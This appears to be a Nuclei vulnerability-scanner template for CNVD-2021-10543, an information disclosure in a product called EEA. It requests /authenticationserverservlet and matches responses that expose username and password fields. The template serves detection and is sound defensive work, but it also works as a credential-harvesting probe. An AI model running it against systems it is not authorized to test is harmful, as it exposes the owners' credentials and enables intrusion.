id: CNVD-2021-10543
info:
  name: EEA - Information Disclosure
  author: pikpikcu
  severity: high
  description: EEA is susceptible to information disclosure.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
  tags: config,exposure,cnvd,cnvd2021
requests:
  - method: GET
    path:
      - "{{BaseURL}}/authenticationserverservlet"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "<username>(.*?)</username>"
          - "<password>(.*?)</password>"
        condition: and
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/05
